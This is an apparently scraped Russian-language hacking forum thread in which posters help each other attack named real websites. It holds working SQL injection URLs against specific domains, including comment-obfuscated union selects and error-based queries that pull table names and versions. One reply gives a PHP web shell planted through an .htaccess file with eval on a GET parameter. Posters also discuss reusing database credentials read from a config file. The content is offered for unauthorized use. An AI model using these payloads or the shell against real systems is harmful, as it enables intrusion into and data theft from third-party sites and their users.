Why does vulnerable number not showing? Code: http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://safariestate.com.pk/details.php?id=964+and+false+/*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
Code: http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA Можно ли раскрутить? и как?
Привет, есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4? Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти. ПС Дайте ссылку на пхпмайадмина хостинга infobox.ru
скорее всего в твоем случае vbulletin хранит фотографии в базе а не в фс. как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)
wkar, тебе надо имя загруженного файла на сервере или имя файла, которое у него было на локальном компе во время загрузки на сервер? У тебя на компе картинка с аватара лежит(ала) в файле o4ad.gif
Пробовал, не подключается, 61 ошибка. ПС хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую 2M_script, название файла не сервере, чтоб в дальнейшем его инклюдить.
Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно. Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов. Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.
Code: SELECT * FROM db WHERE bd1 like '%+order+by+10%00%' мой запрос в кавычках, как от этого избавиться?
http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html создаешь .htaccess с таким содержимым: Code: <Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess #<?php eval($_GET['e']);?> и вызываешь так: site.com/.htaccess?e=phpinfo(); нужно как минимум поставить одинарную кавычку: SELECT * FROM db WHERE bd1 like '%' order by 100#'
Например так Code: http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&keyword=1')/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)or/**/('1
Expl0ited, спасибо запрос схавал, правда реакции нет http://www.usvieda.org/search.php уязвимо поле поиска.
слоит 'and(select(max(1))from(information_schema.columns)group by(concat(version(),0x00,floor(rand(0)*2))))#
Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )
хех,это замечательно,но в браузере такое не прокатит ведь.Я имел ввиду,что из браузера пытаюсь обратиться к скрипту таким образом,а не из phpMyAdmin или другого клиента.
